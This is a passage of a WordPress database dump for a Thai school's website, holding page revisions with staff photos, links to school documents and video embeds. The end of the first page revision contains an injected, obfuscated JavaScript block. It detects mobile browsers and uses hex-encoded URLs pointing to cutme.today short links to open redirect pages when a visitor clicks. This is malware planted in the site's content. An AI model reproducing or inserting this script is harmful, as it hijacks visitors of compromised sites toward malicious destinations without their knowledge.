wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:20:56','2025-10-26 09:20:56','',19,'http://watprato.ssk.in.th/?p=738',0,'revision','',0),
(740,1,'2025-10-26 16:28:35','2025-10-26 09:28:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"linkTo\":\"none\",\"sizeSlug\":\"full\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":46,\"sizeSlug\":\"full\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" class=\"wp-image-46\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group 